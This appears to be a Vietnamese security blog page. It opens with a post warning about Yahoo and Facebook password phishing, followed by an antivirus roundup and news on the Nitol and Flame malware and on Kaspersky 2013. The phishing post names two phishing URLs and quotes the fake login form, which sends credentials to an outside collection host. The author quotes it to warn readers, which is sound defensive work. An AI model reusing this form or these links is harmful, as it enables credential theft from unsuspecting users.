Nạn Ăn cắp mật khẩu Yahoo, Facebook - Cảnh báo và phòng ngừa

10:09 PM |
Cảnh báo - Ăn cắp mật khẩu Yahoo
Trang lấy cắp tài khoản Yahoo. Click xem hình lớn hơn
Thời gian gần đây nhiều người bị mất cắp mật khẩu Yahoo, Facebook. Bằng nhiều chiêu thức và bằng nhiều cách bọn ăn cắp này có thể lấy cắp mật khẩu yahoo, Facebook, cũng như các mật khẩu của các tài khoản khác một cách dễ dàng nếu bạn không cẩn thận.

Chiêu thức phổ biến nhất hiện nay là gửi một đường link (Liên kết) đến một trang nào đó có ô điền TÊN ĐĂNG NHẬP và MẬT KHẨU Yahoo với một tin nhắn có thể là: "Bấm vào đây để xem một hình có mặt (anh/em) rất thú vị". 
Đây là một trang lấy cắp tài khoản Yahoo khác.


Khi chúng lấy được mật khẩu của ai đó, chúng sẽ đăng nhập vào tài khoản đó và gửi tới những người bạn trong list bạn bè của người đó với nội dung tương tự hay khác chút và như vậy nguy cơ là sẽ có vô số tài khoản khác sẽ bị dính chưởng...
Hai trong snhững đường liên kết mà mình biết được đó là http://xemblog.ucoz.net/ và http://3ndy.asia/2/
Bọn chúng sẽ gửi bạn một thông điệp và yêu cầu bạn bấm vào đường liên kết này và nhập tài khoản yahoo vào. Như vậy là bạn dính chưởng. Hình minh họa ở trên là của trang này đó các bạn ạ. Liên kết này mình có được từ một tài khoản của một người bạn đã bị mất trước đây và bọn chúng đã dùng nó để gửi mình một tin nhắn, nó yêu cầu mình đăng nhập yahoo qua trang đó để xem ảnh. Nhưng mình đã không làm thế, mình đã kiểm tra mã nguồn của nó thì thấy đoạn sau:
 ----------------------------------------------------------

<form action="http://xemblog1.pandaform.com/pub/x6zmfc" enctype="multipart/form-data" method="post">
<div class="workflow">
<div class=" step-step"><fieldset title="" class="gp ">
<p class="gp-help"></p>
<div class="gp-content">
<p class="medium fd _id_singleline single"><label for="singleline" class="fd-label">Tên Truy Nhập Yahoo<span class="required"></span><span class="fd-icon"></span></label><span class="content"><input type="text" value="" name="singleline" id="singleline"></span></p>
<p class="medium fd _id_singleline1 single"><label for="singleline1" class="fd-label">____Mật Khẩu_____<span class="required"></span><span class="fd-icon"></span></label><span class="content"><input type="password" value="" name="singleline1" id="singleline1"></span></p>
<p class="medium fd _id_singleline2 single"><label for="singleline2" class="fd-label">___Tên của Bạn___<span class="fd-icon"></span></label><span class="content"><input type="text" value="" name="singleline2" id="singleline2"></span></p>
</div>
</fieldset></div>
<div class="hidden"><input type="hidden" name="$action" value="_firstSubmitInstep"></div>
</div>
<div class="submit">
<button type="submit">VÀO XEM</button>
</div>
</form>
----------------------
Bạn để ý dòng màu tím trên không, lẽ ra nó phải đẫn tới một trang đăng nhập của yahoo nhưng nó lại dẫn tới một trang khác. Trang này chính là trang lưu lại mật khẩu và tên đăng nhập của bạn trên cơ sở dữ liệu của chúng.




Những người không cẩn thận sẽ bị dính chưởng ngay nếu bấm vào đường link đó và trao tên đăng nhập và mật khẩu cho bọn chúng.
Còn một chiêu thức nữa là gửi virus, nhưng chiêu thức này ít được dùng vì không mấy hiệu quả và sẽ bị phần mềm quét virus phát hiện ra ngay. Cả 2 chiêu thức trên đều dùng cùng một cách là phải gửi một đường link tới cho người khác, nhưng cách 1 vẫn là cách hay được bọn chúng sử dụng nhất và những người tò mò và nhẹ dạ cả tin là những người dễ bị dính nhất.
Vậy làm thế nào để khỏi bị mất mật khẩu của các tài khoản???
Theo kinh nghiệm của mình thì bạn nên làm theo cách sau:
  •  Mua phần mềm diệt virus bản quyền cài vào máy và nhớ cập nhật thường xuyên.
  •  Không bao giờ bấm vào các đường liên kết lạ, kể cả từ những người bạn quen biết gửi đến nếu bạn không xác minh được tính đúng đắn của nó.
  •  Không điền vào bất cứ Form nào tên đăng nhập và mật khẩu đăng nhập của mình nếu đó không phải trang của tài khoản mình đang sử dụng.
  • Không trao mật khẩu và tên đăng nhập cho bất cứ ai.
...
Còn nhiều điều khác nữa nhưng đó là những điều cơ bản.
Bạn sẽ làm gì khi bị mất mật khẩu và tên đăng nhập (Nói chung là quyền truy cập vào tài khoản)
- Đối với nhiều người mất quyền truy cập sẽ là một hiểm họa. Vì bọn ăn cắp mật khẩu có thể dùng tài khoản của bạn để làm những chuyện bậy bạ như: xin tiền, moi móc thông tin cá nhân của bạn, nói chung là đủ mọi chiêu mà chúng có thể nghĩ ra - chẳng tốt lành gì cả.
Vì vậy ngay khi mất quyền truy cập vào tài khoản bạn hãy thông báo ngay cho bạn bè của bạn và những người thân của bạn bằng tin nhắn hay bằng cách lập tài khoản khác hay bằng bất cứ cách nào mà bạn nghĩ ra. Để tránh người thân của bạn bị mắc lừa.

Một số người bạn của tôi cũng đã bị mất tài khoản vì bọn này và đã bị chúng lợi dụng xin tiền người thân, nên tôi viết bài này với mục đích nêu cảnh giác cho bạn khỏi mất tài khoản của mình.

Nếu bạn thấy bài này hữu ích hãy gửi cho bạn bè của bạn để giúp họ tránh bị mất mật khẩu.


Read more…

Đánh giá Top phần mềm diệt Virus miễn phí tốt nhất năm 2012 - 2013

9:30 AM |

Đánh giá Top phần mềm diệt Virus miễn phí tốt nhất năm 2012 - 2013

Đánh giá Top phần mềm diệt Virus miễn phí tốt nhất năm 2012 - 2013
ĐÁNH GIÁ TOP PHẦN MỀM DIỆT VIRUS MIỄN PHÍ TỐT NHẤT NĂM 2012 - 2013
Hiện nay, có rất nhiều phần mềm virusmiễn phí nhưng để chọn lựa phần mềm nào tối ưu và hiệu quả nhất với công việc của bạn. Bạn hãy xem đánh giá của tạp chí Pcmag.com để có thể chọn lựa cho mình phần mềm phụ hợp nhất nhé.

Đánh giá Top phần mềm diệt Virus miễn phí tốt nhất năm 2012 - 2013

1. Ad-Aware FREE Internet Security 9.0 (4,5/5 sao)

Ưu điểm: Giao diện người dùng đơn giản và ẩn các chức năng phức tạp khi không cần thiết. Chế độ Full scan hoạt động nhanh chóng. Công nghệ mới cải thiện khả năng loại bỏ các phần mềm độc hại. Điểm số loại bỏ phần mềm độc hại tốt nhất trong các sản phẩm chống virus miễn phí.
Khuyết điểm: Không hoàn toàn làm sạch một số phần mềm độc hại được phát hiện. Chức năng bảo vệ theo thời gian thực không có hành động ngay cả khi có mối đe dọa.
Kết luận: Hầu hết các tiện ích diệt virus miễn phí chỉ thực hiện tốt một trong hai chức năng là loại bỏ phần mềm độc hại hoặc ngăn chặn phần mềm độc hại. Nhưng Ad- Aware Free tỏ ra rất hiệu quả trong cả hai lĩnh vực này, nó hoạt động hiệu quả gần như phiên bản Ad-Aware Pro. Đây là một giải pháp chống virus miễn phí và tuyệt vời. Ngay cả khi bạn không đủ điều kiện tài chính để trang bị cho cá nhân hoặc công ty của mình các giải pháp phòng chống virus từ các phần mềm thương mại thì vẫn còn một giải pháp giúp bạn đảm bảo an toàn dữ liệu cho máy tính từ các phần mềm diệt virus miễn phí.

2. AVG Anti-Virus Free 2012 (4/5 sao)

Ưu điểm: Đạt điểm số rất tốt trong việc loại bỏ phần mềm độc hại và các bài kiểm tra ngăn chặn phần mềm độc hại của PCMag. Xếp hạng cao từ các phòng thí nghiệm độc lập. Bảo vệ chống lừa đảo (phishing) và khai thác (exploits). Thanh công cụ với chức năng tìm kiếm an toàn, truy cập Facebook, và nhiều chức năng khác. Khả năng quét nhanh chóng.
Khuyết điểm: Chức năng quét rootkit lại bị tách rời ra khỏi chức năng quét virus, khả năng chống phising và exploits kém hiệu quả hơn khả năng chống virus.
Kết luận: Sản phẩm miễn phí này có điểm số tốt hơn so với các đối thủ cạnh tranh kể cả các phiên bản thương mại trong các thử nghiệm chống virus, và nó cũng được đánh giá cao từ các phòng thí nghiệm độc lập. Nó tích hợp với các sản phẩm AVG do đó cũng được thừa hưởng các tính năng hữu ích từ hãng này. AVG Anti-Virus Free 2012 được Pcmag đánh giá là “sự lựa chọn cho giải pháp phòng chống virus miễn phí”.

3. Avast! Free version 6.0 (3,5/5 sao)

Ưu điểm: Boot-time sẽ quét và xử lý các phần mềm độc hại “cố thủ” trên máy tính. New Script Shield sẽ giúp kiểm tra các script độc hại. AutoSandbox cho phép các chương trình đáng ngờ chạy một cách an toàn trong sự cô lập. Tính năng Web Reputation sẽ đánh giá và phân loại các trang web.
Nhược điểm: Chức năng Boot-time sẽ yêu cầu sự tương tác với người dùng trong khi quét virus và không loại bỏ các mối đe dọa một cách triệt để. AutoSandbox thường thất bại trong việc cô lập một mối đe dọa trong quá trình thử nghiệm. Tính năng Web Reputation cần thêm thời gian để phát triển đầy đủ thông tin.
Kết luận: Avast! Free có một số tính năng mới rất hào nhoáng và là một chương trình chống virus tuyệt vời. Tuy nhiên, các tính năng mới không tỏa sáng trong các thử nghiệm của Pcmag. Nó cần phải thực hiện tốt hơn nữa công việc làm sạch các mối đe dọa đã phát hiện. Sau cùng, vì nó là phần mềm miễn phí, bạn có thể dùng thử nó và ra quyết định cuối cùng.

4. Avira Free Antivirus 2012 (4/5 sao)

Ưu điểm: Được đánh giá tốt từ các phòng thí nghiệm độc lập và khả năng kiểm tra, dọn dẹp và loại bỏ các phần mềm độc hại thông qua các bài kiểm tra của Pcmag. Chức năng chống phishing cũng được đưa vào sản phẩm như một hình thức khuyến mãi.
Khuyết điểm: Hiệu quả chống rootkit không cao trong các thí nghiệm của Pcmag. Nó đã sai lầm khi xác định một ứng dụng mà Pcmag đưa ra là một loại sâu. Chức năng chống phishing không đạt hiệu quả.
Kết luận: Đây là phần mềm chống virus miễn phí được đánh giá tốt từ các phòng thí nghiệm độc lập cũng như trong các thí nghiệm của Pcmag trong việc ngăn chặn và loại bỏ phần mềm độc hại, mặc dù trong cả hai bài thi đã có một số rắc rối với rootkit. Tuy nhiên, đây cũng là một giải pháp chống virus miễn phí mà bạn nên xem xét.

5. Microsoft Security Essentials 4.0 (4/5 sao)

Ưu điểm: Giao diện người dùng đơn giản, cách ly người dùng ra khỏi các chi tiết khó hiểu trong khi thực hiện các chi tiết có sẵn nếu muốn. Được đánh giá tốt từ các phòng thí nghiệm độc lập.
Khuyết điểm: Khả năng bảo vệ yếu trong Windows XP. Kết quả ngăn chặn phần mềm độc hại và kiểm tra loại bỏ phần mềm độc hại không ấn tượng. Thậm chí một số mối đe dọa vẫn tiếp tục hoạt động sau khi đã được gỡ bỏ.
Kết luận: Nếu sử dụng hệ điều hành Windows của Microsoft, bạn có thể xem xét sử dụng Microsoft Security Essentials để bảo vệ máy tính chống lại virus. Các phòng thí nghiệm độc lập đã đánh giá nó khá tốt đối với hầu hết các thành phần. Trong thử nghiệm của Pcmag thì nó đã không tỏa sáng. Các sản phẩm miễn phí khác cung cấp khả năng bảo vệ tốt hơn
.
Read more…

Máy tính xuất xứ Trung Quốc cài sẵn “mã độc”

12:42 PM |

Máy tính xuất xứ Trung Quốc cài sẵn “mã độc”

Microsoft vừa phát hiện các máy tính mới bán tại Trung Quốc đã cài sẵn mã độc ẩn mình chờ đợi lệnh xâm nhập máy tính người dùng, đánh cắp tài khoản ngân hàng và dữ liệu nhạy cảm, điều khiển máy tính tấn công web từ xa.


Ông David Anselmi, giám đốc cao cấp của bộ phận điều tra tội phạm máy tính Microsoft, chỉ ra sơ đồ phát tán mã độc Nitol - Ảnh: THOMPSON/AP
 
Sự kiện này đã được tiết lộ trong các tài liệu tòa án niêm phong ngày 13.9 tại một tòa án liên bang ở Virginia (Hoa Kỳ).
Các thông tin trong tài liệu mô tả về một chiến dịch của Microsoft chống lại tội phạm mạng đang nhắm vào hệ điều hành Windows - mục tiêu tấn công lớn nhất của các loại virút. Trong đó, Microsoft đã phát hiện một loại mã cực độc mang tên Nitol.
Read more…

LHQ sẽ phát cảnh báo khẩn về siêu vi rút Flame

3:00 PM |

LHQ sẽ phát cảnh báo khẩn về siêu vi rút Flame

Liên Hiệp Quốc sắp phát đi một cảnh báo khẩn về siêu vi rút Flame, loại vi rút máy tính nguy hiểm nhất từng được phát hiện, giữa lúc có nhiều lo ngại nó sẽ lây lan đến các quốc gia thành viên.
Trong động thái được xem là khai mào cho thời đại chiến tranh mạng mới, điều phối viên an ninh mạng của Liên minh Viễn thông Quốc tế trực thuộc Liên Hiệp Quốc (ITU) Marco Obiso nói: “Đây sẽ là cảnh báo nghiêm trọng nhất mà chúng tôi từng phát đi”.
Cảnh báo sẽ khuyến cáo các nước thành viên rằng vi rút Flame là công cụ gián điệp nguy hiểm có khả năng được sử dụng để tấn công các cơ sở hạ tầng quan trọng, ông Obiso nói với hãng Reuters hôm 29/5.
Vào hôm 28/5, hãng bảo mật Kaspersky Lab ở Nga mô tả vi rút Flame là chương trình độc hại có “sự phức tạp và chức năng vượt xa tất cả những mối đe dọa ảo từng được biết cho đến nay”.
Kaspersky cho biết các máy tính ở Iran dường như bị ảnh hương đặc biệt. Theo sau là các máy tính ở Israel, lãnh thổ Palestine, Sudan, Syria và các nước khác ở Trung Đông.
Ảnh
Một đoạn chương trình của vi rút Flame - Ảnh: AFP.
Ông Obiso nói loại vi rút mới nhiều khả năng được tạo ra để phục vụ lợi ích của một quốc gia. Trước đó, hãng Kaspersky cho hay các bằng chứng gợi ý rằng loại vi rút mới có thể được tạo ra bởi cùng một quốc gia (hoặc các quốc gia) viết ra vi rút Stuxnet, chương trình được sử dụng để tấn công cơ sở hạt nhân của Iran vào năm 2010.
“Tôi nghĩ nó là mối đe dọa nghiêm trọng hơn nhiều so với Stuxnet”, ông Obiso nói với Reuters.
Ông Obiso cho biết ITU sẽ thiết lập một chương trình nhằm thu thập dữ liệu, bao gồm mẫu vi rút, để theo dõi sự lây lan trên toàn cầu và quan sát mọi sự thay đổi thành phần của Flame.
Kaspersky Lab thông báo họ phát hiện vi rút Flame sau khi ITU đề nghị công ty này điều tra những báo cáo từ Tehran về loại vi rút bí ẩn vốn đánh cắp lượng dữ liệu lớn trên một số hệ thống máy tính của Iran.
Trong hôm 29/5, cơ quan phụ trách an ninh mạng ở Iran xác nhận vi rút Flame đã tấn công máy tính của các quan chức cao cấp nước này, theo tờ New York Times.
Trung tâm điều phối xử lí sự cố máy tính Iran cảnh báo vi rút Flame nguy hiểm hơn nhiều so với vi rút Stuxnet. Ông Kamran Napelian, quan chức của trung tâm này, nói với tờ New York Times rằng vi rút Flame “có kiểu mẫu đặc biệt chỉ có thể bắt nguồn từ Israel”.
“Vi rút sao chép những gì bạn đánh trên bàn phím, quan sát những gì bạn thấy trên màn hình”, ông Napelian nói. Ông này cho biết Iran đã phát triển một phần mềm để chống trả Flame, điều mà cộng đồng quốc tế chưa làm được.
Trong khi đó, một quan chức cao cấp Israel đã gợi ý về sự dính líu của Tel Aviv trong hôm 29/5. Phó thủ tướng kiêm Bộ trưởng các vấn đề chiến lược Israel Moshe Yaalon phát biểu trên đài phát thanh quân đội về loại vi rút mới phát hiện: “Với bất kì ai xem mối đe dọa Iran là đáng kể, việc họ thực hiện những bước đi khác nhau nhằm gây tổn hại cho Iran là điều hợp lí”.
Theo TNO
Read more…

Những điều cần biết về Flame, sâu máy tính nguy hiểm nhất lịch sử

2:00 PM |

Những điều cần biết về Flame, sâu máy tính nguy hiểm nhất lịch sử

Flame, loại sâu máy tính vừa được các chuyên gia bảo mật phát hiện ra vào cuối tháng 5 vừa qua mà hãng bảo mật danh tiếng Kaspersky Lab đã gọi là “vũ khí công nghệ tinh vi nhất chưa từng có”. Vậy Flame đáng sợ đến mức nào?
Flame là loại sâu máy tính đã bị hãng bảo mật Kaspersky Lab phát hiện ra vào những ngày cuối tháng 5 vừa qua.
Flame có thể ẩn nấp trên các máy tính ít nhất trong vòng 5 năm, phần mềm độc hại này sẽ ăn cắp dữ liệu, nghe trộm các cuộc đàm thoại, chụp ảnh màn hình các phần mềm chat… khiến cho nó thực sự nguy hiểm với bất kì ai sử dụng máy tính và Internet.

Flame là gì và nguy hiểm đến mức nào?

Flame là một vũ khí công nghệ tấn công tinh vi, sẽ để lại một cửa sau (backdoor) hoặc Trojan trên máy tính của nạn nhân và có thể lây truyền chính nó trên hệ thống mạng nội bộ, tương tự như cách thức hoạt động của các loại sâu máy tính khác.
Ảnh
Flame có thể theo dõi thông tin kết nối Internet, chụp ảnh màn hình, ghi lại âm thanh các cuộc đàm thoại, bí mật ghi lại thông tin gõ trên bàn phím và thu thập thông tin về các thiết bị sử dụng Bluetooth ở gần thiết bị lây nhiễm Flame và biến máy tính của nạn nhân thành một thiết bị phát hiện Bluetooth.
Chưa dừng lại ở đó, các hacker còn có thể cập nhật các mô-đun để bổ sung thêm nhiều chức năng cho Flame ngay trên máy tính của nạn nhân. Hiện có khoảng 20 mô-đun khác nhau của sâu máy tính này đã bị phát hiện và các nhà nghiên cứu bảo mật đang tìm hiểu xem chức năng thực sự của các mô-đun này là gì.
Tên của loại phần mềm độc hại này (Flame) được đặt dựa theo tên của một mô-đun chính, thực hiện nhiệm vụ tấn công và phát tán trên nhiều máy tính. Hiện các nhà nghiên cứu bảo mật đã phát hiện ra nhiều biến thể của Flame và phát hiện ra chúng đang có kết nối với 80 máy chủ khác nhau.
“Flame là một khối kết cấu nhiều mô-đun. Về cơ bản mục tiêu sẽ bị lây nhiễm bằng các mô-đun chính và sau đó những kẻ tấn công sẽ tải lên các mô-đun phụ thực hiện các chức năng cần thiết”, Roel Schouwenberg, chuyên gia bảo mật của Kaspersky cho biết. “Chúng tôi cho rằng hiện vẫn chưa thể nắm rõ được có bao nhiêu mô-đun mà các hacker có thể sử dụng cho Flame”.
Kaspersky Lab dự đoán rằng Flame sử dụng một lỗ hổng bảo mật nghiêm trọng trên Windows để phát tán, tuy nhiên thông tin này chưa được Microsoft xác nhận.

Flame lây lan như thế nào?

Flame có thể lây lan thông qua ổ đĩa gắn ngoài như USB, ổ cứng di động, hệ thống mạng chia sẻ hoặc máy in được chia sẻ.. tuy nhiên, hiện các chuyên gia bảo mật vẫn chưa thể tìm ra nguồn gốc lây lan ban đầu của loại malware nguy hiểm này.
Ảnh
Các hình thức và nguồn gốc có thể lây nhiễm của Flame
Kaspersky Lab dự đoán một email lừa đảo có chứa mã độc chính là nguồn gốc lây lan của Flame.

Flame đã xuất hiện trong bao lâu?

Trên thực tế, không phải đến tận tháng 5 năm nay, Flame mới được phát hiện, mà Kaspersky Lab cho biết những dấu hiệu xuất hiện Flame đã có từ năm 2010, thậm chí có những bằng chứng cho rằng Flame đã từng xuất hiện từ năm 2007 hoặc từ trước đó.

Tại sao Flame không bị phát hiện sớm hơn?

Theo đánh giá của các chuyên gia bảo mật, thì cho dù tác giả của Flame là ai thì thủ phạm đã cực kì nỗ lực để lập trình giúp cho sâu máy tính này có thể ẩn dấu và tránh bị phát hiện càng lâu càng tốt.
“Rõ ràng đây là một dự án hàng triệu đô được tài trợ bởi một chính phủ nào đó”, Schouwenberg, chuyên gia bảo mật của Kaspersky dự đoán.
Không giống với việc lây lan mạnh mẽ như các sâu máy tính nguy hiểm trước đây, có vẻ như Flame chỉ lây lan nhằm vào những mục tiêu cụ thể mà các hacker nhắm tới. Flame cho thấy sự bất thường về kích cỡ và sử dụng một ngôn ngữ lập trình không phổ biến, ngôn ngữ lập trình Lua, do đó, ban đầu Flame có vẻ như không có gì quá nguy hiểm.
“Tác giả của Flame đã thực sự tài tình trong việc che dấu sự hiện diện của nó”, Schouwenberg cho biết thêm. “Bởi vì Flame không sử dụng những công nghệ xâm nhập và ẩn dấu mà các loại sâu máy tính khác thường sử dụng, do vậy các phần mềm bảo mật không thể phát hiện ra. Để phát hiện ra Flame là một điều không dễ dàng gì”.

Ai là tác giả của Flame?

Hiện chưa rõ ai là tác giả cũng như ai là người chịu trách nhiệm phát tán loại mã độc này, tuy nhiên Kaspersky Lab tin rằng một chính phủ nào đó, hoặc một tổ chức được chính phủ tài trợ đằng sau chính là tác giả của Flame vì bản chất tiên tiến của sâu máy tính này.
Ảnh
Bản đồ phân bổ sự lây nhiễm của Flame, chủ yếu tập trung ở Trung Đông và Bắc Phi
Khi được hỏi liệu có phải Mỹ hay Israel đứng sau Flame, với mục tiêu chính trị nhắm vào Iran hay không, Schouwenberg cho biết không dám chắc điều này.
"Mặc dù Flame được lập trình và chú thích bằng tiếng Anh, không có nghĩa rằng một quốc gia nói tiếng Anh đứng đằng sau phần mềm độc hại này", Schouwenberg suy luận.
Trong khi đó, nhiều trang công nghệ trích dẫn "nguồn tin cao cấp của Israel" xác nhận rằng các chuyên gia công nghệ của Israel đã tạo ra Flame để "xâm nhập các máy tính của các cá nhân cao cấp ở Iran, Palestin và nhiều nơi khác, bao gồm cả Israel, những người được cho là tham gia vào các hoạt động tình báo".

Mức độ lây nhiễm của Flame nghiêm trọng đến mức nào?

Các chuyên gia bảo mật của Kaspersky tin rằng có nhiều biến thể của Flame hơn số lượng hiện tại mà họ đang biết, đặc biệt là số mô-đun mà các hacker có thể sử dụng. Ngoài ra, Kaspersky cũng cho rằng có một đội ngũ nhân lực hùng hậu đứng đằng sau Flame để giúp nó ngày càng trở nên nguy hiểm hơn.
Hiện Flame đang sử dụng hơn 80 máy chủ để điều khiển và kết nối, cho thấy một nguồn tài nguyên "hùng hậu" đứng đằng sau sâu máy tính này.

Mục tiêu của Flame là những ai?

Theo Kaspersky thì tỉ lệ lây lan Flame cao nhất là ở Israel, Palestine, Sudan, Syria, Li-băng, Ả-rập Saudi và Ai Cập. Trong khi đó, hãng bảo mật danh tiếng khác là Symantec lại cho rằng mục tiêu chính mà Flame nhắm đến là Bờ tây Palestine, Hungary, Iran và Li-băng.
Tuy nhiên, hiện tại các chuyên gia bảo mật chưa biết chắc rằng đây chỉ là những mục tiêu duy nhất được nhắm đến, hay chỉ mới là sự lây lan trong một khu vực ở Trung Đông trước khi mã độc này lây lan rộng rãi ra toàn cầu.

Bao nhiêu người đã bị lây nhiễm Flame?

Như trên đã đề cập, có vẻ như Flame đang nhắm đến những mục tiêu nhất định, thay vì số lượng lây lan rầm rộ, nên hiện tại số người lây nhiễm Flame chưa lớn.
Ảnh
Có những mục đích chính trị đứng đằng sau sự lây nhiễm của Flame?
Kaspersky cho biết hiện có khoảng 300-400 người dùng các sản phẩm của hãng đã có thông báo về sự lây nhiễm Flame trên máy tính của họ. Tuy nhiên trên thực tế con số này có thể vượt quá 1.000 người trên toàn cầu. Phần lớn người bị nhiễm Flame đang sống tại Iran và Trung Đông, số ít còn lại ở Mỹ.
Tuy nhiên, điều này không có nghĩ rằng những người dùng còn lại "vô can" với Flame, đặc biệt khi đây được đánh giá là một sâu máy tính nguy hiểm và tinh vi.

Lời kết

Mặc dù Flame được xem là đại diện cho một cuộc tấn công gián điệp không gian mạng tinh vi, tuy nhiên các chuyên gia bảo mật không cho rằng đây là dấu hiệu của một cuộc chiến tranh mạng.
Trước Flame, nhiều quốc gia đã từng tiến hành các hoạt động gián điệp trên không gian mạng thông qua những loại sâu máy tính tinh vi, như sâu máy tính Stuxnet trước đây nhằm vào Iran và quốc gia này cáo buộc là có sự nhúng tay vào của các nước phương Tây, đặc biệt là Mỹ và Israel. Stuxnet được cho là thiết kế để phá hoại các chương trình hạt nhân của Iran sau khi các nỗ lực ngoại giao dần thất bại.
Tuy nhiên, ngược lại, đây cũng được xem là "tin tốt" với người dùng thông thường trên toàn thế giới, khi họ không phải là mục tiêu ưu tiên hàng đầu mà Flame nhắm vào, điều này đồng nghĩa với việc nguy cơ bị lây nhiễm Flame trên máy tính của họ thất hơn, nhưng không có nghĩa là nguy cơ này không hiện diện.
Theo Dân Trí
Read more…

Kaspersky 2013 những tính năng mới được giới thiệu

10:05 PM |

Kaspersky giới thiệu tính năng mới sẽ có trong Kaspersky 2013

Trong hội thảo thử nghiệm sản phẩm Kaspersky diễn ra tại San Francisco vừa qua, Kaspersky Lab đã giới thiệu một số tính năng bảo mật mới sẽ có trong những sản phẩm sắp tới của hãng.
Ảnh
Kaspersky 2013 sẽ có thêm nhiều tính năng nổi trội mới. Oleg Ishanov, giám đốc nghiên cứu phương pháp phòng chống các phần mềm độc hại của Kaspersky gọi tính năng đó là “trói buộc chương trình ASLR (Address Space Layout Randomization). ASLR là một tính năng của hệ điều hành MacOS, iSO, và hệ điều hành Window. Kaspersky buộc ASLR thay đổi địa điểm các mô-đun bộ nhớ và điều này gây khó khăn cho các mã độc shell trong việc tiến hành khai thác dữ liệu trên máy tính người dùng trong bước 2. Và tính năng này cũng hoạt động hiệu quả trong cả hệ điều hành Window XP.
Safe Money là tên một tập hợp các tính năng của sản phẩm Kaspersky trong việc bảo vệ an toàn cho các thông tin tài khoản ngân hàng trực tuyến. Sản phẩm Kaspersky 2013 với tính năng phòng chống giả mạo giúp phát hiện ra các trang web lừa đảo bằng cách phân tích nội dung trang web trong thời gian hoạt động thực. Sản phẩm cũng tiến hành chống gian lận bằng cách kiểm tra mức độ danh tiếng của trang web được truy cập.
Ảnh
Hiện nay các chuyên gia Kaspersky Lab đang tiến hành thử nghiệm sự tương thích của tính năng Safe Money đối với các dịch vụ tài chính ngân hàng tại Việt Nam. Các sản phẩm phiên bản 2013 bao gồm Kaspersky Internet Security và Kaspersky Anti-Virus hiện đều đang trong giai đoạn thử nghiệm.
Read more…

AI Video maker

pictory

Code type Ad code